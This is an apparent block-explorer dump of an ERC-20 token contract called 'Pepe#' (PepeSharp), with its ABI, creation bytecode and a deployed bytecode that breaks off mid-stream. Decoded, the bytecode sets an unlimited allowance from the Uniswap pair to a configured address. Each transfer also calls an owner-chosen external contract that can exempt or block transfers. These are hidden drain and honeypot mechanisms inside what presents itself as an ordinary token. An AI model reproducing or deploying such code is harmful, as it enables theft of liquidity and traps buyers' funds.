[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"components":[{"internalType":"address","name":"uniRouterAddr","type":"address"},{"internalType":"address","name":"peSharpAddr","type":"address"},{"internalType":"address","name":"peSharpProtocol","type":"address"}],"internalType":"struct PepeSharp.PeSharpProtoc","name":"peSharpProtocolVal","type":"tuple"},{"components":[{"internalType":"uint256","name":"tranxMaxAmt","type":"uint256"},{"internalType":"uint256","name":"walletMaxAmt","type":"uint256"},{"internalType":"address","name":"feePeSharpWalt","type":"address"},{"internalType":"uint256","name":"buyFirstFee","type":"uint256"},{"internalType":"uint256","name":"sellFirstFee","type":"uint256"}],"internalType":"struct PepeSharp.ConfigPeSharpLimit","name":"taxPeSharpConfig","type":"tuple"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"uint8","name":"decimals_","type":"uint8"}],"stateMutability":"payable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ExcludedFromFee","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address[]","name":"accounts","type":"address[]"},{"indexed":false,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ExcludedMultipleFromFee","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"pair","type":"address"},{"indexed":true,"internalType":"bool","name":"value","type":"bool"}],"name":"LPPairUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyTaxValue","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"bool","name":"excluded","type":"bool"}],"name":"excludeFromFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"isAutomationMarketMakers","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"mxValueForTrans","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"mxValueWallet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"peSharpWalt","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeMaxLimits","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"sellTaxValue","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"swapExact","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapRouterv2","outputs":[{"internalType":"contract IUniswapRouter02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"v2PairVal","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"stateMutability":"payable","type":"receive"}]

6080604052604051620022d5380380620022d5833981016040819052620000269162000964565b848282600162000037848262000ad8565b50600262000046838262000ad8565b506003805460ff191660ff92909216919091179055505f9050620000673390565b600680546001600160a01b0319166001600160a01b038316908117909155604051919250905f907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908290a3508351600780546001600160a01b0319166001600160a01b0390921691821790556040805163c45a015560e01b8152905163c45a0155916004808201926020929091908290030181865afa1580156200010e573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019062000134919062000ba0565b6001600160a01b031663c9c653963060075f9054906101000a90046001600160a01b03166001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa15801562000194573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190620001ba919062000ba0565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303815f875af115801562000205573d5f803e3d5ffd5b505050506040513d601f19601f820116820180604052508101906200022b919062000ba0565b600f80546001600160a01b0319166001600160a01b0392909216918217905560208501516200025c91600162000437565b66017e9d8602b400600c819055620002846127106200027d84600a62000cc9565b906200053d565b84516200029390839062000cd9565b6200029f919062000cd9565b601155620002b66127106200027d84600a62000cc9565b818560200151620002c8919062000cd9565b620002d4919062000cd9565b601255620002e482600a62000cc9565b620002f282611f406200053d565b620002ff90600162000cf3565b6200030b919062000cd9565b60105560808401516009556060840151600a5560075462000337906001600160a01b031660016200058f565b8451601380546001600160a01b03199081166001600160a01b0393841617909155602087015160148054831691841691909117905560408088015160158054841682861617905590870151600b805490931693169290921790556200039e9060016200058f565b620003ab3060016200058f565b620003ca620003c26006546001600160a01b031690565b60016200058f565b6020850151620003dc9060016200058f565b600b54620003f5906001600160a01b031660016200058f565b6200042b6200040c6006546001600160a01b031690565b6200041984600a62000cc9565b62000425908462000cd9565b62000649565b50505050505062000d5d565b6001600160a01b0382165f9081526008602052604090205481151560ff909116151503620004d25760405162461bcd60e51b815260206004820152603860248201527f4175746f6d61746564206d61726b6574206d616b65722070616972206973206160448201527f6c72656164792073657420746f20746861742076616c7565000000000000000060648201526084015b60405180910390fd5b6001600160a01b038281165f818152600860209081526040808320805460ff1916871515908117909155600583528184209589168452949091528082205f199055517f4bf69fee59f1751bf6064f46595c52d722796b529aca2b5a7b6d1ac6a8f8b0319190a3505050565b5f6200058683836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f0000000000008152506200072b60201b60201c565b90505b92915050565b6006546001600160a01b03163314620005eb5760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401620004c9565b6001600160a01b0382165f818152600e6020908152604091829020805460ff191685151590811790915591519182527f2d43abd87b27cee7b0aa8c6f7e0b4a3247b683262a83cbc2318b0df398a49aa9910160405180910390a25050565b6001600160a01b038216620006a15760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f2061646472657373006044820152606401620004c9565b600454620006b090826200076a565b6004556001600160a01b0382165f90815260208190526040902054620006d790826200076a565b6001600160a01b0383165f81815260208181526040808320949094559251848152919290917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050565b5f81836200074e5760405162461bcd60e51b8152600401620004c9919062000d09565b505f6200075c848662000d3d565b95945050505050565b505050565b5f8062000778838562000cf3565b905083811015620005865760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f7700000000006044820152606401620004c9565b634e487b7160e01b5f52604160045260245ffd5b604051606081016001600160401b0381118282101715620008055762000805620007cc565b60405290565b5f5b83811015620008275781810151838201526020016200080d565b50505f910152565b5f82601f8301126200083f575f80fd5b81516001600160401b03808211156200085c576200085c620007cc565b604051601f8301601f19908116603f01168101908282118183101715620008875762000887620007cc565b81604052838152866020858801011115620008a0575f80fd5b620008b38460208301602089016200080b565b9695505050505050565b80516001600160a01b0381168114620008d4575f80fd5b919050565b5f60a08284031215620008ea575f80fd5b60405160a081016001600160401b03811182821017156200090f576200090f620007cc565b806040525080915082518152602083015160208201526200093360408401620008bd565b604082015260608301516060820152608083015160808201525092915050565b805160ff81168114620008d4575f80fd5b5f805f805f8587036101608112156200097b575f80fd5b86516001600160401b038082111562000992575f80fd5b620009a08a838b016200082f565b97506060601f1984011215620009b4575f80fd5b620009be620007e0565b9250620009ce60208a01620008bd565b8352620009de60408a01620008bd565b6020840152620009f160608a01620008bd565b604084015282965062000a088a60808b01620008d9565b955061012089015192508083111562000a1f575f80fd5b505062000a2f888289016200082f565b92505062000a41610140870162000953565b90509295509295909350565b600181811c9082168062000a6257607f821691505b60208210810362000a8157634e487b7160e01b5f52602260045260245ffd5b50919050565b601f82111562000765575f81815260208120601f850160051c8101602086101562000aaf5750805b601f850160051c820191505b8181101562000ad05782815560010162000abb565b505050505050565b81516001600160401b0381111562000af45762000af4620007cc565b62000b0c8162000b05845462000a4d565b8462000a87565b602080601f83116001811462000b42575f841562000b2a5750858301515b5f19600386901b1c1916600185901b17855562000ad0565b5f85815260208120601f198616915b8281101562000b725788860151825594840194600190910190840162000b51565b508582101562000b9057878501515f19600388901b60f8161c191681555b5050505050600190811b01905550565b5f6020828403121562000bb1575f80fd5b6200058682620008bd565b634e487b7160e01b5f52601160045260245ffd5b600181815b8085111562000c1057815f190482111562000bf45762000bf462000bbc565b8085161562000c0257918102915b93841c939080029062000bd5565b509250929050565b5f8262000c285750600162000589565b8162000c3657505f62000589565b816001811462000c4f576002811462000c5a5762000c7a565b600191505062000589565b60ff84111562000c6e5762000c6e62000bbc565b50506001821b62000589565b5060208310610133831016604e8410600b841016171562000c9f575081810a62000589565b62000cab838362000bd0565b805f190482111562000cc15762000cc162000bbc565b029392505050565b5f6200058660ff84168362000c18565b808202811582820484141762000589576200058962000bbc565b8082018082111562000589576200058962000bbc565b602081525f825180602084015262000d298160408501602087016200080b565b601f01601f19169190910160400192915050565b5f8262000d5857634e487b7160e01b5f52601260045260245ffd5b500490565b61156a8062000d6b5f395ff3fe608060405260043610610164575f3560e01c80638da5cb5b116100cd578063d9a5b0cc11610087578063f2fa0ccc11610062578063f2fa0ccc1461043d578063f2fde38b1461045c578063f6a78e171461047b578063fce6a6061461048f575f80fd5b8063d9a5b0cc146103cf578063dd62ed3e146103e4578063f1da476114610428575f80fd5b80638da5cb5b1461032c57806395d89b41146103495780639e44586d1461035d578063a457c2d714610372578063a9059cbb14610391578063c0246668146103b0575f80fd5b8063313ce5671161011e578063313ce5671461024c578063395093511461026d5780635ed99dad1461028c578063641c74e9146102c357806370a08231146102e2578063715018a614610316575f80fd5b806306fdde031461016f5780630757fcd014610199578063095ea7b3146101bc57806318160ddd146101eb57806323b872dd146101ff5780632a6383141461021e575f80fd5b3661016b57005b5f80fd5b34801561017a575f80fd5b506101836104a4565b60405161019091906111e3565b60405180910390f35b3480156101a4575f80fd5b506101ae600a5481565b604051908152602001610190565b3480156101c7575f80fd5b506101db6101d6366004611245565b610534565b6040519015158152602001610190565b3480156101f6575f80fd5b506004546101ae565b34801561020a575f80fd5b506101db61021936600461126f565b61054a565b348015610229575f80fd5b506101db6102383660046112ad565b60086020525f908152604090205460ff1681565b348015610257575f80fd5b5060035460405160ff9091168152602001610190565b348015610278575f80fd5b506101db610287366004611245565b6105b1565b348015610297575f80fd5b506007546102ab906001600160a01b031681565b6040516001600160a01b039091168152602001610190565b3480156102ce575f80fd5b50600f546102ab906001600160a01b031681565b3480156102ed575f80fd5b506101ae6102fc3660046112ad565b6001600160a01b03165f9081526020819052604090205490565b348015610321575f80fd5b5061032a6105e6565b005b348015610337575f80fd5b506006546001600160a01b03166102ab565b348015610354575f80fd5b50610183610662565b348015610368575f80fd5b506101ae60095481565b34801561037d575f80fd5b506101db61038c366004611245565b610671565b34801561039c575f80fd5b506101db6103ab366004611245565b6106be565b3480156103bb575f80fd5b5061032a6103ca3660046112c8565b6106ca565b3480156103da575f80fd5b506101ae60115481565b3480156103ef575f80fd5b506101ae6103fe366004611303565b6001600160a01b039182165f90815260056020908152604080832093909416825291909152205490565b348015610433575f80fd5b506101ae60125481565b348015610448575f80fd5b50600b546102ab906001600160a01b031681565b348015610467575f80fd5b5061032a6104763660046112ad565b610752565b348015610486575f80fd5b5061032a61083c565b34801561049a575f80fd5b506101ae60105481565b6060600180546104b39061132f565b80601f01602080910402602001604051908101604052809291908181526020018280546104df9061132f565b801561052a5780601f106105015761010080835404028352916020019161052a565b820191905f5260205f20905b81548152906001019060200180831161050d57829003601f168201915b5050505050905090565b5f610540338484610874565b5060015b92915050565b5f610556848484610998565b6105a784336105a2856040518060600160405280602881526020016114e8602891396001600160a01b038a165f9081526005602090815260408083203384529091529020549190610c40565b610874565b5060019392505050565b335f8181526005602090815260408083206001600160a01b038716845290915281205490916105409185906105a29086610c78565b6006546001600160a01b031633146106195760405162461bcd60e51b815260040161061090611367565b60405180910390fd5b6006546040515f916001600160a01b0316907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3600680546001600160a01b0319169055565b6060600280546104b39061132f565b5f61054033846105a28560405180606001604052806025815260200161151060259139335f9081526005602090815260408083206001600160a01b038d1684529091529020549190610c40565b5f610540338484610998565b6006546001600160a01b031633146106f45760405162461bcd60e51b815260040161061090611367565b6001600160a01b0382165f818152600e6020908152604091829020805460ff191685151590811790915591519182527f2d43abd87b27cee7b0aa8c6f7e0b4a3247b683262a83cbc2318b0df398a49aa9910160405180910390a25050565b6006546001600160a01b0316331461077c5760405162461bcd60e51b815260040161061090611367565b6001600160a01b0381166107e15760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610610565b6006546040516001600160a01b038084169216907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0905f90a3600680546001600160a01b0319166001600160a01b0392909216919091179055565b6006546001600160a01b031633146108665760405162461bcd60e51b815260040161061090611367565b600454601255600454601155565b6001600160a01b0383166108d65760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610610565b6001600160a01b0382166109375760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610610565b6001600160a01b038381165f8181526005602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b03821615806109b857506001600160a01b03821661dead145b806109c857506109c88383610cdd565b806109d1575080155b156109e6576109e1838383610d9d565b505050565b601154811115610a4d5760405162461bcd60e51b815260206004820152602c60248201527f5472616e7366657220616d6f756e74206578636565647320746865206d78566160448201526b363ab2a337b92a3930b7399760a11b6064820152608401610610565b600f546001600160a01b03838116911614610ad7576001600160a01b0382165f90815260208190526040902054601254610a8783836113b0565b1115610ad55760405162461bcd60e51b815260206004820152601d60248201527f45786365656473206d6178696d756d2077616c6c657420616d6f756e740000006044820152606401610610565b505b305f90815260208190526040902054601054600d54908210159060ff16158015610afe5750805b8015610b2257506001600160a01b0385165f9081526008602052604090205460ff16155b15610b5e57600d805460ff19166001179055818015610b5257600b54610b529082906001600160a01b0316610f1d565b50600d805460ff191690555b600d546001600160a01b0385165f908152600e602052604090205460ff91821615911680610ba357506001600160a01b0386165f908152600e602052604090205460ff165b15610bab57505f5b8015610c2d575f610bd36103e8610bcd600a5488610f6f90919063ffffffff16565b90610fed565b6001600160a01b0387165f9081526008602052604090205490915060ff1615610c1457610c116103e8610bcd60095488610f6f90919063ffffffff16565b90505b610c1e858261102e565b9450610c2b873083610d9d565b505b610c38868686610d9d565b505050505050565b5f8184841115610c635760405162461bcd60e51b815260040161061091906111e3565b505f610c6f84866113c3565b95945050505050565b5f80610c8483856113b0565b905083811015610cd65760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f7700000000006044820152606401610610565b9392505050565b6001600160a01b0382165f908152600e602052604081205460ff1680610d1a57506001600160a01b0382165f908152600e602052604090205460ff165b80610cd6575060155460405163cc5489df60e01b81526001600160a01b03858116600483015284811660248301525f92169063cc5489df906044016020604051808303815f875af1158015610d71573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610d9591906113d6565b119392505050565b6001600160a01b038316610e015760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610610565b6001600160a01b038216610e635760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610610565b610e9f816040518060600160405280602681526020016114c2602691396001600160a01b0386165f908152602081905260409020549190610c40565b6001600160a01b038085165f908152602081905260408082209390935590841681522054610ecd9082610c78565b6001600160a01b038381165f818152602081815260409182902094909455518481529092918616917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910161098b565b47610f278361106f565b5f610f32478361102e565b6040519091506001600160a01b0384169082156108fc029083905f818181858888f19350505050158015610f68573d5f803e3d5ffd5b5050505050565b5f825f03610f7e57505f610544565b5f610f8983856113ed565b905082610f968583611404565b14610cd65760405162461bcd60e51b815260206004820152602160248201527f536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f6044820152607760f81b6064820152608401610610565b5f610cd683836040518060400160405280601a81526020017f536166654d6174683a206469766973696f6e206279207a65726f0000000000008152506111b7565b5f610cd683836040518060400160405280601e81526020017f536166654d6174683a207375627472616374696f6e206f766572666c6f770000815250610c40565b6040805160028082526060820183525f9260208301908036833701905050905030815f815181106110a2576110a2611423565b6001600160a01b03928316602091820292909201810191909152600754604080516315ab88c960e31b81529051919093169263ad5c46489260048083019391928290030181865afa1580156110f9573d5f803e3d5ffd5b505050506040513d601f19601f8201168201806040525081019061111d9190611437565b8160018151811061113057611130611423565b6001600160a01b0392831660209182029290920101526007546111569130911684610874565b60075460405163791ac94760e01b81526001600160a01b039091169063791ac9479061118e9085905f90869030904290600401611452565b5f604051808303815f87803b1580156111a5575f80fd5b505af1158015610c38573d5f803e3d5ffd5b5f81836111d75760405162461bcd60e51b815260040161061091906111e3565b505f610c6f8486611404565b5f6020808352835180828501525f5b8181101561120e578581018301518582016040015282016111f2565b505f604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b0381168114611242575f80fd5b50565b5f8060408385031215611256575f80fd5b82356112618161122e565b946020939093013593505050565b5f805f60608486031215611281575f80fd5b833561128c8161122e565b9250602084013561129c8161122e565b929592945050506040919091013590565b5f602082840312156112bd575f80fd5b8135610cd68161122e565b5f80604083850312156112d9575f80fd5b82356112e48161122e565b9150602083013580151581146112f8575f80fd5b809150509250929050565b5f8060408385031215611314575f80fd5b823561131f8161122e565b915060208301356112f88161122e565b600181811c9082168061134357607f821691505b60208210810361136157634e487b7160e01b5f52602260045260245ffd5b50919050565b6020808252818101527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572604082015260600190565b634e487b7160e01b5f52601160045260245ffd5b808201808211156105445761054461139c565b818103818111156105445761054461139c565b5f602082840312156113e6575f80fd5b5051919050565b80820281158282048414176105445761054461139c565b5f8261141e57634e487b7160e01b5f52601260045260245ffd5b500490565b634e487b7160e01b5f52603260045260245ffd5b5f60208284031215611447575f80fd5b8151610cd68161122e565b5f60a082018783526020878185015260a0604085015281875180845260c08601915082890193505f5b818110156114a05784516001600160a01b03168352938301939183019160010161147b565b50506001600160a01b0396909616606085015250505060800152939250505056fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa26469706673582212209ce6b203bc9b17faf45f2f6cd340a4550293d4ef859939988e475cbb53fbe9ba64736f6c6343000814003300000000000000000000000000000000000000000000000000000000000001600000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d000000000000000000000000578ded75b76b72821804014879263da1b4ef07b900000000000000000000000079969e79305abe22b8edbdbf28e12f3149f63ed300000000000000000000000000000000000000000000000000000000000001f300000000000000000000000000000000000000000000000000000000000001f300000000000000000000000042894e9da99db6881632282842bb224e8afc7cb60000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001a000000000000000000000000000000000000000000000000000000000000000120000000000000000000000000000000000000000000000000000000000000005506570652300000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000055045504523000000000000000000000000000000000000000000000000000000

Deployed Bytecode

0x608060405260043610610164575f3560e01c80638da5cb5b116100cd578063d9a5b0cc11610087578063f2fa0ccc11610062578063f2fa0ccc1461043d578063f2fde38b1461045c578063f6a78e171461047b578063fce6a6061461048f575f80fd5b8063d9a5b0cc146103cf578063dd62ed3e146103e4578063f1da476114610428575f80fd5b80638da5cb5b1461032c57806395d89b41146103495780639e44586d1461035d578063a457c2d714610372578063a9059cbb14610391578063c0246668146103b0575f80fd5b8063313ce5671161011e578063313ce5671461024c578063395093511461026d5780635ed99dad1461028c578063641c74e9146102c357806370a08231146102e2578063715018a614610316575f80fd5b806306fdde031461016f5780630757fcd014610199578063095ea7b3146101bc57806318160ddd146101eb57806323b872dd146101ff5780632a6383141461021e575f80fd5b3661016b57005b5f80fd5b34801561017a575f80fd5b506101836104a4565b60405161019091906111e3565b60405180910390f35b3480156101a4575f80fd5b506101ae600a5481565b604051908152602001610190565b3480156101c7575f80fd5b506101db6101d6366004611245565b610534565b6040519015158152602001610190565b3480156101f6575f80fd5b506004546101ae565b34801561020a575f80fd5b506101db61021936600461126f565b61054a565b348015610229575f80fd5b506101db6102383660046112ad565b60086020525f908152604090205460ff1681565b348015610257575f80fd5b5060035460405160ff9091168152602001610190565b348015610278575f80fd5b506101db610287366004611245565b6105b1565b348015610297575f80fd5b506007546102ab906001600160a01b031681565b6040516001600160a01b039091168152602001610190565b3480156102ce575f80fd5b50600f546102ab906001600160a01b031681565b3480156102ed575f80fd5b506101ae6102fc3660046112ad565b6001600160a01b03165f9081526020819052604090205490565b348015610321575f80fd5b5061032a6105e6565b005b348015610337575f80fd5b506006546001600160a01b03166102ab565b348015610354575f80fd5b50610183610662565b348015610368575f80fd5b506101ae60095481565b34801561037d575f80fd5b506101db61038c366004611245565b610671565b34801561039c575f80fd5b506101db6103ab366004611245565b6106be565b3480156103bb575f80fd5b5061032a6103ca3660046112c8565b6106ca565b3480156103da575f80fd5b506101ae60115481565b3480156103ef575f80fd5b506101ae6103fe366004611303565b6001600160a01b039182165f90815260056020908152604080832093909416825291909152205490565b348015610433575f80fd5b506101ae60125481565b348015610448575f80fd5b50600b546102ab906001600160a01b031681565b348015610467575f80fd5b5061032a6104763660046112ad565b610752565b348015610486575f80fd5b5061032a61083c565b34801561049a575f80fd5b506101ae60105481565b6060600180546104b39061132f565b80601f01602080910402602001604051908101604052809291908181526020018280546104df9061132f565b801561052a5780601f106105015761010080835404028352916020019161052a565b820191905f5260205f20905b81548152906001019060200180831161050d57829003601f168201915b5050505050905090565b5f610540338484610874565b5060015b92915050565b5f610556848484610998565b6105a784336105a2856040518060600160405280602881526020016114e8602891396001600160a01b038a165f9081526005602090815260408083203384529091529020549190610c40565b610874565b5060019392505050565b335f8181526005602090815260408083206001600160a01b038716845290915281205490916105409185906105a29086610c78565b6006546001600160a01b031633146106195760405162461bcd60e51b815260040161061090611367565b60405180910390fd5b6006546040515f916001600160a01b0316907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0908390a3600680546001600160a01b0319169055565b6060600280546104b39061132f565b5f61054033846105a28560405180606001604052806025815260200161151060259139335f9081526005602090815260408083206001600160a01b038d1684529091529020549190610c40565b5f610540338484610998565b6006546001600160a01b031633146106f45760405162461bcd60e51b815260040161061090611367565b6001600160a01b0382165f818152600e6020908152604091829020805460ff191685151590811790915591519182527f2d43abd87b27cee7b0aa8c6f7e0b4a3247b683262a83cbc2318b0df398a49aa9910160405180910390a25050565b6006546001600160a01b0316331461077c5760405162461bcd60e51b815260040161061090611367565b6001600160a01b0381166107e15760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610610565b6006546040516001600160a01b038084169216907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e0905f90a3600680546001600160a01b0319166001600160a01b0392909216919091179055565b6006546001600160a01b031633146108665760405162461bcd60e51b815260040161061090611367565b600454601255600454601155565b6001600160a01b0383166108d65760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610610565b6001600160a01b0382166109375760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610610565b6001600160a01b038381165f8181526005602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92591015b60405180910390a3505050565b6001600160a01b03821615806109b857506001600160a01b03821661dead145b806109c857506109c88383610cdd565b806109d1575080155b156109e6576109e1838383610d9d565b505050565b601154811115610a4d5760405162461bcd60e51b815260206004820152602c60248201527f5472616e7366657220616d6f756e74206578636565647320746865206d78566160448201526b363ab2a337b92a3930b7399760a11b6064820152608401610610565b600f546001600160a01b03838116911614610ad7576001600160a01b0382165f90815260208190526040902054601254610a8783836113b0565b1115610ad55760405162461bcd60e51b815260206004820152601d60248201527f45786365656473206d6178696d756d2077616c6c657420616d6f756e740000006044820152606401610610565b505b305f90815260208190526040902054601054600d54908210159060ff16158015610afe5750805b8015610b2257506001600160a01b0385165f9081526008602052604090205460ff16155b15610b5e57600d805460ff19166001179055818015610b5257600b54610b529082906001600160a01b0316610f1d565b50600d805460ff191690555b600d546001600160a01b0385165f908152600e602052604090205460ff91821615911680610ba357506001600160a01b0386165f908152600e602052604090205460ff165b15610bab57505f5b8015610c2d575f610bd36103e8610bcd600a5488610f6f90919063ffffffff16565b90610fed565b6001600160a01b0387165f9081526008602052604090205490915060ff1615610c1457610c116103e8610bcd60095488610f6f90919063ffffffff16565b90505b610c1e858261102e565b9450610c2b873083610d9d565b505b610c38868686610d9d565b505050505050565b5f8184841115610c635760405162461bcd60e51b815260040161061091906111e3565b505f610c6f84866113c3565b95945050505050565b5f80610c8483856113b0565b905083811015610cd65760405162461bcd60e51b815260206004820152601b60248201527f536166654d6174683a206164646974696f6e206f766572666c6f7700000000006044820152606401610610565b9392505050565b6001600160a01b0382165f908152600e602052604081205460ff1680610d1a57506001600160a01b0382165f908152600e602052604090205460ff165b80610cd6575060155460405163cc5489df60e01b81526001600160a01b03858116600483015284811660248301525f92169063cc5489df906044016020604051808303815f875af1158015610d71573d5f803e3d5ffd5b505050506040513d601f19601f82011682018060405250810190610d9591906113d6565b119392505050565b6001600160a01b038316610e015760405162461bcd60e51b815260206004820152602560248201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604482015264647265737360d81b6064820152608401610610565b6001600160a01b038216610e635760405162461bcd60e51b815260206004820152602360248201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260448201526265737360e81b6064820152608401610610565b610e9f816040518060600160405280602681526020016114c2602691396001600160a01b0386165f908152602081905260409020549190610c40565b6001600160a01b038085165f908152602081905260408082209390935590841681522054610ecd9082610c78565b6001600160a01b038381165f818152602081815260409182902094909455518481529092918616917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910161098b565b47610f278361106f565b5f610f32478361102e565b6040519091506001600160a01b0384169082156108fc029083905f818181858888f19350505050158015610f68573d5f